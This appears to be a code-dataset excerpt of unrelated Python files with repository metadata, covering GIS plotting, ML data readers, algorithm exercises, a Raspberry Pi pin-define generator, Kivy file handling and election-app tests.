dy) # print("P1") # print(quer[4]) if quer[4] is not None: x.append(pa[1] + dx * f + dyn * quer[4] / 100) y.append(pa[2] + dy * f - dxn * quer[4] / 100) x.append(pa[1] + dx * f + dyn * quer[5] / 100) y.append(pa[2] + dy * f - dxn * quer[5] / 100) c = 1 if c == 1 and p[0] <= quer[1]: # print("P2") # Prozentualer Abstand f = (p[0]-quer[0])/(quer[1]-quer[0]) # print(f) # Abstand interpolieren a = quer[4]+f*(quer[6]-quer[4]) # print(a) # Abstand2 interpolieren b = quer[5]+f*(quer[7]-quer[5]) # print(b) try: x.insert(0, p[1] - p[4] * a / 100) y.insert(0, p[2] + p[3] * a / 100) x.append(p[1] - p[4] * b / 100) y.append(p[2] + p[3] * b / 100) except TypeError: break if c == 1 and p[0] > quer[1]: # print("P3") # Berechnung Endpunkt dx = p[1] - pa[1] dy = p[2] - pa[2] if (p[0] - pa[0]) != 0: f = (quer[1] - pa[0]) / (p[0] - pa[0]) else: f = 1 # print(p[0]) # print(f) dxn, dyn, s = QDViewer.norm(dx, dy) if quer[6] is not None: x.insert(0, pa[1] + dx * f + dyn * quer[6] / 100) y.insert(0, pa[2] + dy * f - dxn * quer[6] / 100) if quer[7] is not None: x.append(pa[1] + dx * f + dyn * quer[7] / 100) y.append(pa[2] + dy * f - dxn * quer[7] / 100) break pa = p self.write_polygon(x, y, row, quer) print("Fertig") def run(self): """Run method that performs all the real work""" # show the dialog self.dlg.show() self.dlg.fw_speichern.setStorageMode(QgsFileWidget.GetDirectory) # Run the dialog event loop result = self.dlg.exec_() # See if OK was pressed if result: # Do something useful here - delete the line containing pass and # substitute with your code. self.arbeite() pass
46.520064
121
0.530364
096fcd42c6d9f08d5d089e2c6170449d67a02488
4,290
py
Python
deprecated/examples/simnet_bow/py_reader_generator.py
hutuxian/FleetX
843c7aa33f5a14680becf058a3aaf0327eefafd4
[ "Apache-2.0" ]
170
2020-08-12T12:07:01.000Z
2022-03-07T02:38:26.000Z
deprecated/examples/simnet_bow/py_reader_generator.py
hutuxian/FleetX
843c7aa33f5a14680becf058a3aaf0327eefafd4
[ "Apache-2.0" ]
195
2020-08-13T03:22:15.000Z
2022-03-30T07:40:25.000Z
deprecated/examples/simnet_bow/py_reader_generator.py
hutuxian/FleetX
843c7aa33f5a14680becf058a3aaf0327eefafd4
[ "Apache-2.0" ]
67
2020-08-14T02:07:46.000Z
2022-03-28T10:05:33.000Z
#!/usr/bin/python # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # There are 13 integer features and 26 categorical features import random def combination(x, y): res = [[[xi, yi] for yi in y] for xi in x] return res[0] def get_one_data(file_list, sample_rate): for file in file_list: contents = [] with open(file, "r") as fin: for q in fin.readlines(): """query_ids, pos_title_ids, neg_title_ids, label""" one_data = q.split(";")[:-1] if len(one_data) < 4: print("data format error!, please check!", q) continue label = int(one_data[0]) pos_title_num, neg_title_num = int(one_data[1].split(" ")[0]), int(one_data[1].split(" ")[1]) query_ids = [int(x) for x in one_data[2].split(" ")] if pos_title_num + neg_title_num != len(one_data) - 3: print("data format error, pos_title_num={}, neg_title_num={}, one_data={}" .format(pos_title_num, neg_title_num, len(one_data))) continue for x in range(pos_title_num): pos_title_ids = [ int(i) for i in one_data[3+x].split(" ")] for y in range(neg_title_num): if random.random() > sample_rate: continue neg_title_ids = [int(i) for i in one_data[3+pos_title_num+y].split(" ")] yield [query_ids, pos_title_ids, neg_title_ids, [label]] fin.close() def get_batch_reader(file_list, batch_size=128, sample_rate=0.02, trainer_id=1): def batch_reader(): res = [] idx = 0 for i in get_one_data(file_list, sample_rate): res.append(i) idx += 1 if len(res) >= batch_size: yield res res = [] return batch_reader def get_infer_data(file_list, sample_rate): for file in file_list: contents = [] with open(file, "r") as fin: for q in fin.readlines(): """query_ids, pos_title_ids, neg_title_ids, label""" one_data = q.split(";")[:-1] if len(one_data) < 4: print("data format error!, please check!",q) continue label = int(one_data[0]) pos_title_num, neg_title_num = int(one_data[1].split(" ")[0]), int(one_data[1].split(" ")[1]) query_ids = [int(x) for x in one_data[2].split(" ")] if pos_title_num + neg_title_num != len(one_data) - 3: print("data format error, pos_title_num={}, neg_title_num={}, one_data={}" .format(pos_title_num,neg_title_num,len(one_data))) continue for x in range(pos_title_num): pos_title_ids = [int(i) for i in one_data[3 + x].split(" ")] for y in range(neg_title_num): if random.random() > sample_rate: continue neg_title_ids = [int(i) for i in one_data[3 + pos_title_num + y].split(" ")] yield [query_ids, pos_title_ids, neg_title_ids] fin.close() def get_infer_batch_reader(file_list, batch_size=128, sample_rate=0.02, trainer_id=1): def batch_reader(): res = [] idx = 0 for i in get_infer_data(file_list, sample_rate): res.append(i) idx += 1 if len(res) >= batch_size: yield res res = [] return batch_reader
39
109
0.545221
111d89dc3fa97f05216826d77249b04673a33d5f
381
py
Python
examples/seq2seq/att_all_need/__init__.py
yym6472/transformers
abd01205561e5caec167c1fbb20bccea24d7ba46
[ "Apache-2.0" ]
1
2021-12-30T05:41:37.000Z
2021-12-30T05:41:37.000Z
examples/seq2seq/att_all_need/__init__.py
yym6472/transformers
abd01205561e5caec167c1fbb20bccea24d7ba46
[ "Apache-2.0" ]
null
null
null
examples/seq2seq/att_all_need/__init__.py
yym6472/transformers
abd01205561e5caec167c1fbb20bccea24d7ba46
[ "Apache-2.0" ]
null
null
null
import att_all_need.Constants import att_all_need.Modules import att_all_need.Layers import att_all_need.SubLayers import att_all_need.Models import att_all_need.Translator import att_all_need.Optim __all__ = [ att_all_need.Constants, att_all_need.Modules, att_all_need.Layers, att_all_need.SubLayers, att_all_need.Models, att_all_need.Optim, att_all_need.Translator]
29.307692
70
0.84252
6e79cb55306cf44f641a4fcd8e7ab51391678716
517
py
Python
Datastructures/linearSearch.py
BALAVIGNESHDOSTRIX/pyexpert
300498f66a3a4f6b3060d51b3d6643d8e63cf746
[ "CC0-1.0" ]
null
null
null
Datastructures/linearSearch.py
BALAVIGNESHDOSTRIX/pyexpert
300498f66a3a4f6b3060d51b3d6643d8e63cf746
[ "CC0-1.0" ]
null
null
null
Datastructures/linearSearch.py
BALAVIGNESHDOSTRIX/pyexpert
300498f66a3a4f6b3060d51b3d6643d8e63cf746
[ "CC0-1.0" ]
null
null
null
#Linear Search class LinearSerach: def __init__(self): self.elements = [10,52,14,8,1,400,900,200,2,0] def SearchEm(self,elem): y = 0 if elem in self.elements: print("{x} is in the position of {y}".format(x = elem,y = self.elements.index(elem))) else: print("The element {x} not presented in the list".format(x = elem)) linear = LinearSerach() task_elem = int(input("Enter the element:")) linear.SearchEm(task_elem)
21.541667
97
0.576402
2853cd0347b667a039186eec376666b20fb855dc
467
py
Python
Python/M01_ProgrammingBasics/L06_NestedLoops/Exercises/Solutions/P04_TrainTheTrainers.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L06_NestedLoops/Exercises/Solutions/P04_TrainTheTrainers.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L06_NestedLoops/Exercises/Solutions/P04_TrainTheTrainers.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
1
2022-02-23T13:03:14.000Z
2022-02-23T13:03:14.000Z
people = int(input()) name_doc = input() grade_sum = 0 average_grade = 0 total_grade = 0 numbers = 0 while name_doc != "Finish": for x in range(people): grade = float(input()) grade_sum += grade average_grade = grade_sum / people print(f"{name_doc} - {average_grade:.2f}.") name_doc = input() grade_sum = 0 total_grade += average_grade numbers += 1 print(f"Student's final assessment is {total_grade / numbers:.2f}.")
24.578947
68
0.640257
95be5f081349f73ff5bdd3615dda1dea6e95803e
218
py
Python
Algorithms/Implementation/designer_pdf_viewer.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
Algorithms/Implementation/designer_pdf_viewer.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
Algorithms/Implementation/designer_pdf_viewer.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import sys import string h = list(map(int, input().strip().split(' '))) word = input().strip() L = list(string.ascii_lowercase) wi = [h[L.index(w)] for w in word] print(len(word) * max(wi))
15.571429
46
0.642202
c2864f7e6f1b9b8bc01c8cc1bc2f59a6a1c5eb5a
2,659
py
Python
resources/mechanics_lib/FixedLegsBuilder.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
7
2016-01-20T02:33:00.000Z
2021-02-04T04:06:57.000Z
resources/mechanics_lib/FixedLegsBuilder.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
null
null
null
resources/mechanics_lib/FixedLegsBuilder.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
3
2016-10-05T07:20:30.000Z
2017-11-20T10:36:50.000Z
from api.component import Component ################### # Component builder ################### c = Component() ### Subcomponents used in this assembly c.addSubcomponent("bar", "RectBeam") c.addSubcomponent("leg1", "PointedLeg") c.addSubcomponent("leg2", "PointedLeg") c.addSubcomponent("split", "SplitEdge") ### New free parameters specific to this assembly c.newParameter("depth") c.newParameter("height") c.newParameter("length") c.newParameter("leg.beamwidth") ### Subcomponent parameter inheritance # Constrain one length of the RectBeam object based on new FixedLegs parameter c.addConstraint(("bar", "length"), "length") # Constrain one parameter of the RectBeam object based on PointedLeg parameter c.addConstraint(("bar", "depth"), "leg.beamwidth") # Constrain other parameter of the RectBeam object based on new FixedLegs parameter c.addConstraint(("bar", "width"), "depth") # Constrain one parameter of the PointedLeg object based on new FixedLegs parameter c.addConstraint(("leg1", "length"), "height") # Constrain one parameter of the RectBeam object based on PointedLeg parameter c.addConstraint(("leg1", "beamwidth"), "leg.beamwidth") # Constrain one parameter of the PointedLeg object based on new FixedLegs parameter c.addConstraint(("leg2", "length"), "height") # Constrain one parameter of the RectBeam object based on PointedLeg parameter c.addConstraint(("leg2", "beamwidth"), "leg.beamwidth") # Break apart the edge where the two PointedLegs will connect c.addConstraint(("split", "botlength"), ("length", "leg.beamwidth"), "(x[0],)") c.addConstraint(("split", "toplength"), ("length", "leg.beamwidth"), "(x[1], x[0] - 2*x[1], x[1])") ### Subcomponents connections # SplitEdge component to define multiple attachment points c.addConnection(("bar", "tabedge"), ("split", "botedge"), "Flat") # Attach one leg c.addConnection(("split", "topedge.2"), ("leg1", "front"), "Flat") # Attach other leg c.addConnection(("split", "topedge.0"), ("leg2", "right"), "Flat") # Add tabs for rigid attachment c.addConnection(("leg1", "right"), ("bar", "botedge.1"), "Tab", name="tab1", angle=90, depth=6) c.addConnection(("leg2", "front"), ("bar", "topedge.1"), "Tab", name="tab2", angle=90, depth=6) ### Exoposed interfaces # Locations on FixedLegs component that higher order components can use for assembly c.inheritInterface("topedge", ("bar", "topedge")) c.inheritInterface("botedge", ("bar", "botedge")) c.toYaml("FixedLegs.yaml")
35.453333
99
0.657766
b0b8286a112f6cc255d6f141cac0e14ff0ca06ff
37
py
Python
app/others/__init__.py
pushyzheng/docker-oj-web
119abae3763cd2e53c686a320af7f4f5af1f16ca
[ "MIT" ]
2
2019-06-24T08:34:39.000Z
2019-06-27T12:23:47.000Z
app/user/__init__.py
pushyzheng/docker-oj-web
119abae3763cd2e53c686a320af7f4f5af1f16ca
[ "MIT" ]
null
null
null
app/user/__init__.py
pushyzheng/docker-oj-web
119abae3763cd2e53c686a320af7f4f5af1f16ca
[ "MIT" ]
null
null
null
# encoding:utf-8 from . import views
12.333333
19
0.72973
b0362586ab24eacfd3e6ed4b0d747c1e52f21716
1,532
py
Python
src/entity/GridSampler.py
dreaming-coder/RadarSet
c912298d0d6058c6647986524e5d95a205b51c1d
[ "MIT" ]
null
null
null
src/entity/GridSampler.py
dreaming-coder/RadarSet
c912298d0d6058c6647986524e5d95a205b51c1d
[ "MIT" ]
null
null
null
src/entity/GridSampler.py
dreaming-coder/RadarSet
c912298d0d6058c6647986524e5d95a205b51c1d
[ "MIT" ]
null
null
null
import numpy as np from numpy import ndarray from sklearn.neighbors import KNeighborsRegressor __all__ = ["GridSampler"] class GridSampler(object): def __init__(self, data: ndarray, longitude: ndarray, latitude: ndarray, k: int = 5): """ :param data: dbz :param longitude: 经度 :param latitude: 维度 :param k: 取几个临近点 ※※※※※※※※※※※※※※※※※※※※ ※※ ※※ ※※ 所有的参数都是一维的数据 ※※ ※※ ※※ ※※※※※※※※※※※※※※※※※※※※ """ assert data.ndim == 1 and longitude.ndim == 1 and latitude.ndim == 1 and k > 1 longitude, self.lon_avg, self.lon_std = _normalize(longitude) latitude, self.lat_avg, self.lat_std = _normalize(latitude) inputs = np.dstack([longitude, latitude])[0] self.knn = KNeighborsRegressor(n_neighbors=k, weights="distance") data[np.isnan(data)] = 0 # 雷达缺失值用 0 填充,否则 KNN 会报错 self.knn.fit(inputs, data) def map_data(self, lon: ndarray, lat: ndarray) -> ndarray: shape = lon.shape lon = lon.ravel() lat = lat.ravel() lon = (lon - self.lon_avg) / self.lon_std lat = (lat - self.lat_avg) / self.lat_std inputs = np.dstack([lon, lat])[0] outputs = self.knn.predict(inputs).reshape(shape) return outputs def _normalize(data: ndarray): avg = data.mean() std = data.std() data = (data - avg) / std return data, avg, std
30.64
89
0.535901
05f54f0884c8616422ea49c91577829790703cff
3,717
py
Python
tools/generate-defines.py
lurch/Pinout2
bd3b39de2c053607b9415dd9eb0297a401ba7162
[ "CC-BY-4.0" ]
null
null
null
tools/generate-defines.py
lurch/Pinout2
bd3b39de2c053607b9415dd9eb0297a401ba7162
[ "CC-BY-4.0" ]
null
null
null
tools/generate-defines.py
lurch/Pinout2
bd3b39de2c053607b9415dd9eb0297a401ba7162
[ "CC-BY-4.0" ]
null
null
null
#!/usr/bin/env python import json import markdown import unicodedata import re import os import time import sys lang = 'en' pins = None key_template = { 'python': '{board_name}_{name}', 'ruby': '{board_name}_{name}', 'spin': ' {board_name}_{name}', 'c': '#define {board_name}_{name}' } value_template = { 'python': ' = {value}', 'ruby': ' = {value}', 'spin': ' = {value}', 'c': ' {value}' } comment_prefix = { 'python': '#', 'ruby': '', 'spin': '\'', 'c': '//' } def slugify(value): """ Normalizes string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens. """ value = unicode(value) value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii') value = value.replace('+','PLUS') value = value.replace('-','MINUS') value = re.sub('[^\w\s-]', '', value).strip().lower() return re.sub('[-\s]+', '_', value) def bcm_to_physical(pin): pin = pin[3:] for idx in pins: compare_pin = pins[idx] if 'scheme' in compare_pin: if 'bcm' in compare_pin['scheme']: if compare_pin['scheme']['bcm'] == int(pin): print("Mapping BCM{} to {}".format(pin, str(idx))) return str(idx) def physical_to_bcm(pin): pin = pins[pin] if 'scheme' in pin: if 'bcm' in pin['scheme']: return str(pin['scheme']['bcm']) return None def physical_to_wiringpi(pin): pin = pins[pin] if 'scheme' in pin: if 'wiringpi' in pin['scheme']: return str(pin['scheme']['wiringpi']) return None def physical_to(pin, scheme='bcm'): if scheme in ['bcm','wiringpi']: pin = pins[pin] if 'scheme' in pin: if scheme in pin['scheme']: return str(pin['scheme'][scheme]) elif scheme == 'physical': return pin return None db = json.load(open('../src/{}/pi-pinout.json'.format(lang))) pins = db['pins'] define = {} keys = [] def add_define(key, value): global keys, define keys.append(key) define[key] = value if len(sys.argv) >= 3: overlay_file = sys.argv[1] pin_scheme = sys.argv[2] output_lang = sys.argv[3] overlay = json.load(open('../src/{}/overlay/{}.json'.format(lang,overlay_file))) if 'i2c' in overlay: for addr in overlay['i2c']: info = overlay['i2c'][addr] add_define('ADDR_' + slugify(info['name']).upper(), addr) if 'pin' in overlay: for pin in overlay['pin']: info = overlay['pin'][pin] if str(pin).startswith('bcm'): pin = bcm_to_physical(pin) if 'name' in info: name = slugify(info['name']).upper() else: name = slugify(pins[pin]['name']).upper() add_define(name, physical_to(pin, pin_scheme)) board_name = slugify(overlay['name']).upper() print(comment_prefix[output_lang] + ' Pin definitions for ' + overlay['name']) print(comment_prefix[output_lang] + ' Using the {} pin numbering scheme'.format(pin_scheme)) row_length = 0 for name in define: key = key_template[output_lang].format( board_name = board_name, name = name ) row_length = max(len(key),row_length) for name in keys: key = key_template[output_lang].format( board_name = board_name, name = name ) value = value_template[output_lang].format(value = define[name]) value = value.rjust(row_length - len(key) + len(value),' ') print(key+value)
25.458904
96
0.552596
afc4a3f0be4d9ea808205f06cf570014790fdc8d
203
py
Python
Algorithms/Sorting/CountingSort2.py
baby5/HackerRank
1e68a85f40499adb9b52a4da16936f85ac231233
[ "MIT" ]
null
null
null
Algorithms/Sorting/CountingSort2.py
baby5/HackerRank
1e68a85f40499adb9b52a4da16936f85ac231233
[ "MIT" ]
null
null
null
Algorithms/Sorting/CountingSort2.py
baby5/HackerRank
1e68a85f40499adb9b52a4da16936f85ac231233
[ "MIT" ]
null
null
null
#coding:utf-8 from collections import Counter n = int(raw_input()) counter = Counter(raw_input().split()) ar = [] for i in xrange(100): ar += [str(i)] * counter.get(str(i), 0) print ' '.join(ar)
15.615385
43
0.630542
bb7101ada8ce544953bb0426ef09e562f84cae47
529
py
Python
pyntcloud/neighbors/r_neighbors.py
bernssolg/pyntcloud-master
84cf000b7a7f69a2c1b36f9624f05f65160bf992
[ "MIT" ]
1,142
2016-10-10T08:55:30.000Z
2022-03-30T04:46:16.000Z
pyntcloud/neighbors/r_neighbors.py
bernssolg/pyntcloud-master
84cf000b7a7f69a2c1b36f9624f05f65160bf992
[ "MIT" ]
195
2016-10-10T08:30:37.000Z
2022-02-17T12:51:17.000Z
pyntcloud/neighbors/r_neighbors.py
bernssolg/pyntcloud-master
84cf000b7a7f69a2c1b36f9624f05f65160bf992
[ "MIT" ]
215
2017-02-28T00:50:29.000Z
2022-03-22T17:01:31.000Z
import numpy as np def r_neighbors(kdtree, r): """ Get indices of all neartest neighbors with a distance < r for each point Parameters ---------- kdtree: pyntcloud.structrues.KDTree The KDTree built on top of the points in point cloud r: float Maximum distance to consider a neighbor Returns ------- r_neighbors: (N, X) ndarray of lists Where N = kdtree.data.shape[0] len(X) varies for each point """ return np.array(kdtree.query_ball_tree(kdtree, r))
24.045455
80
0.635161
3c873fcdcd88197cf9e2a49adb8d73709128b60d
2,571
py
Python
src/bo4e/bo/standorteigenschaften.py
bo4e/BO4E-python
28b12f853c8a496d14b133759b7aa2d6661f79a0
[ "MIT" ]
1
2022-03-02T12:49:44.000Z
2022-03-02T12:49:44.000Z
src/bo4e/bo/standorteigenschaften.py
bo4e/BO4E-python
28b12f853c8a496d14b133759b7aa2d6661f79a0
[ "MIT" ]
21
2022-02-04T07:38:46.000Z
2022-03-28T14:01:53.000Z
src/bo4e/bo/standorteigenschaften.py
bo4e/BO4E-python
28b12f853c8a496d14b133759b7aa2d6661f79a0
[ "MIT" ]
null
null
null
""" Contains Standorteigenschaften class and corresponding marshmallow schema for de-/serialization """ from typing import List, Optional import attr from marshmallow import fields from bo4e.bo.geschaeftsobjekt import Geschaeftsobjekt, GeschaeftsobjektSchema from bo4e.com.standorteigenschaftenallgemein import StandorteigenschaftenAllgemein, StandorteigenschaftenAllgemeinSchema from bo4e.com.standorteigenschaftengas import StandorteigenschaftenGas, StandorteigenschaftenGasSchema from bo4e.com.standorteigenschaftenstrom import StandorteigenschaftenStrom, StandorteigenschaftenStromSchema from bo4e.enum.botyp import BoTyp from bo4e.validators import check_list_length_at_least_one # pylint: disable=too-few-public-methods @attr.s(auto_attribs=True, kw_only=True) class Standorteigenschaften(Geschaeftsobjekt): """ Modelliert die regionalen und spartenspezifischen Eigenschaften einer gegebenen Adresse. .. HINT:: `Standorteigenschaften JSON Schema <https://json-schema.app/view/%23?url=https://raw.githubusercontent.com/Hochfrequenz/BO4E-python/main/json_schemas/bo/StandorteigenschaftenSchema.json>`_ """ # required attributes bo_typ: BoTyp = attr.ib(default=BoTyp.STANDORTEIGENSCHAFTEN) #: Allgemeine Eigenschaften eigenschaften_allgemein: StandorteigenschaftenAllgemein = attr.ib( validator=attr.validators.instance_of(StandorteigenschaftenAllgemein) ) #: Eigenschaften zur Sparte Strom eigenschaften_strom: List[StandorteigenschaftenStrom] = attr.ib( validator=attr.validators.deep_iterable( member_validator=attr.validators.instance_of(StandorteigenschaftenStrom), iterable_validator=check_list_length_at_least_one, ) ) # optional attributes #: Eigenschaften zur Sparte Gas eigenschaften_gas: Optional[StandorteigenschaftenGas] = attr.ib( validator=attr.validators.optional(attr.validators.instance_of(StandorteigenschaftenGas)), default=None ) class StandorteigenschaftenSchema(GeschaeftsobjektSchema): """ Schema for de-/serialization of Standorteigenschaften """ class_name = Standorteigenschaften # required attributes eigenschaften_allgemein = fields.Nested(StandorteigenschaftenAllgemeinSchema, data_key="eigenschaftenAllgemein") eigenschaften_strom = fields.List(fields.Nested(StandorteigenschaftenStromSchema), data_key="eigenschaftenStrom") # optional attributes eigenschaften_gas = fields.Nested(StandorteigenschaftenGasSchema, load_default=None, data_key="eigenschaftenGas")
41.467742
196
0.801634
b1f8a1cb4b21c3994787c2e39a860fa22f68d47b
3,738
py
Python
pocketthrone/managers/filemanager.py
herrschr/pocket-throne
819ebae250f45b0a4b15a8320e2836c0b5113528
[ "BSD-2-Clause" ]
4
2016-06-05T16:48:04.000Z
2020-03-23T20:06:06.000Z
pocketthrone/managers/filemanager.py
herrschr/pocket-throne
819ebae250f45b0a4b15a8320e2836c0b5113528
[ "BSD-2-Clause" ]
null
null
null
pocketthrone/managers/filemanager.py
herrschr/pocket-throne
819ebae250f45b0a4b15a8320e2836c0b5113528
[ "BSD-2-Clause" ]
null
null
null
__all__ = ['FileManager'] import os from kivy.core.image import Image as CoreImage from kivy.cache import Cache # static class for accessing game paths and os methods class FileManager: _tag = "[FileManager] " _initialized = False IMAGE_FORMAT = ".png" # to be set diectly after creation root = {"game": None, "img": None, "mod": None} # texture cache TEXTURE_CACHE = "textures" _texture_none = None @classmethod def set_game_root(self, path): '''sets the game folder paths considering root path''' self.root["game"] = path self.root["img"] = path + "/img/" self.root["mod"] = path + "/mods/" self.initialize() @classmethod def initialize(self): '''flag FileManager as initialized''' # make texture cache Cache.register(self.TEXTURE_CACHE) # flag FileManager as initialized self._initialized = True @classmethod def check_if_initialized(self): '''aborts method if manager is uninitialized''' if not self._initialized: return False @classmethod def game_root(self): '''returns root doler path''' self.check_if_initialized() return self.root["game"] @classmethod def img_root(self): '''returns the image resource folder path''' self.check_if_initialized() return self.root["img"] @classmethod def img_format(self): '''returns accepted image file extension''' return ".png" @classmethod def mod_root(self): '''returns the mod folder path''' self.check_if_initialized() return self.root["mod"] @classmethod def exists(self, file_name, is_image=False, auto_ext=True): '''returns whether a file exists''' if is_image: file_path = self.img_root() + file_name if auto_ext: file_path += ".png" return os.path.isfile(file_path) return os.path.isfile(file_name) @classmethod def read_file(self, file_path): '''returns content of file under path file_path''' print(self._tag + "READ " + file_path) content = "" file = open(file_path, "r") content = file.read() file.close() return content @classmethod def get_texture(self, name, type="", use_cache=True): '''returns a kivy Texture loaded from''' # argument rel_path is relative this games image directory texture = None # when manager is uninitialized if not self._initialized: print(self._tag + "ERROR manager is not initialized") return None # when parameter rel_path is None -> return default texture elif name == None or name == "none": print(self._tag + "ERROR while loading texture; is none.") return # when manager is initialized AND rel_path =/= None OR "none" elif use_cache == True: return self.get_texture_from_cache(name) elif use_cache == False: return self.get_texture_from_file(name) @classmethod def get_texture_from_file(self, name): '''returns texture class from file name''' full_name = str(name) + ".png" abs_path = self.img_root() + full_name texture = None try: if abs_path: print(self._tag + "trying to load " + str(abs_path) + " from file") image = CoreImage(abs_path) if image: texture = image.texture except: print(self._tag + "ABORT; can't load texture") return return texture @classmethod def add_texture_to_cache(self, name): '''ads a texture to texture cache''' texture = self.get_texture_from_file(name) Cache.append(self.TEXTURE_CACHE, name, texture) @classmethod def get_texture_from_cache(self, name): '''returns a texture under name from cache''' #try to load texture from cache texture = Cache.get(self.TEXTURE_CACHE, name) if texture != None: return texture if texture == None: # load from file & add to cache texture = self.get_texture_from_file(name) self.add_texture_to_cache(name) # return texture return texture
26.323944
71
0.706528
3ca3476d9be341c7d55701d15be9a0ebb8d9184e
2,156
py
Python
tests/onegov/election_day/views/test_views_upload_parties.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/election_day/views/test_views_upload_parties.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/election_day/views/test_views_upload_parties.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from datetime import date from tests.onegov.election_day.common import create_election_compound from tests.onegov.election_day.common import login from tests.onegov.election_day.common import upload_election_compound from tests.onegov.election_day.common import upload_party_results from tests.onegov.election_day.common import upload_proporz_election from unittest.mock import patch from webtest import TestApp as Client from webtest.forms import Upload def test_upload_parties_invalidate_cache(election_day_app_gr): anonymous = Client(election_day_app_gr) anonymous.get('/locale/de_CH').follow() client = Client(election_day_app_gr) client.get('/locale/de_CH').follow() login(client) upload_proporz_election(client) upload_election_compound(client) urls = ( '/election/proporz-election/party-strengths', '/elections/elections/party-strengths' ) for url in urls: assert '49117' not in client.get(url) assert '49117' not in anonymous.get(url) upload_party_results(client) upload_party_results(client, slug='elections/elections') for url in urls: assert '49117' in client.get(url) assert '49117' in anonymous.get(url) def test_upload_parties_submit(election_day_app): client = Client(election_day_app) client.get('/locale/de_CH').follow() login(client) new = client.get('/manage/elections/new-election') new.form['election_de'] = 'election' new.form['date'] = date(2015, 1, 1) new.form['mandates'] = 1 new.form['election_type'] = 'proporz' new.form['domain'] = 'federation' new.form.submit() create_election_compound(client) for slug in ('election/election', 'elections/elections'): with patch( 'onegov.election_day.views.upload.parties.import_party_results' ) as import_: import_.return_value = [] csv = 'csv'.encode('utf-8') upload = client.get(f'/{slug}/upload-party-results') upload.form['parties'] = Upload('data.csv', csv, 'text/plain') upload = upload.form.submit() assert import_.called
32.666667
75
0.699443
a7362c94db122a53c8a49772b5f9f48ba739cbeb
700
py
Python
Problem Solving/Mathematics/Probability/Assignment Problem/assignment_problem.py
xuedong/hacker-rank
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
[ "MIT" ]
1
2021-02-22T17:37:45.000Z
2021-02-22T17:37:45.000Z
Problem Solving/Mathematics/Probability/Assignment Problem/assignment_problem.py
xuedong/hacker-rank
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
[ "MIT" ]
null
null
null
Problem Solving/Mathematics/Probability/Assignment Problem/assignment_problem.py
xuedong/hacker-rank
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 from decimal import Decimal def partial(M, N, k): if k == 0: return 0 s = Decimal(1) q = Decimal(1) for i in range(min(M//k, N)): q *= Decimal(-(N-i)) / Decimal(i+1) for j in range(k): q *= Decimal((M-i*k-j)) / Decimal((N+M-i*k-1-j)) s += q return float(s) def solve(M, N): before = 0 res = 0 for k in range(1, M+1): after = partial(M, N, k+1) res += k * (after - before) before = after return res if __name__ == "__main__": cases = int(input()) for _ in range(cases): M, N = map(int, input().split()) res = solve(M, N) print(res)
18.421053
60
0.482857
59615b3836eb35dfa9694a2ef16ac67ab3458829
66,665
py
Python
UAE-main/Emarite.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-17T03:35:03.000Z
2021-12-08T06:00:31.000Z
UAE-main/Emarite.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
null
null
null
UAE-main/Emarite.py
Zusyaku/Termux-And-Lali-Linux-V2
b1a1b0841d22d4bf2cc7932b72716d55f070871e
[ "Apache-2.0" ]
2
2021-11-05T18:07:48.000Z
2022-02-24T21:25:07.000Z
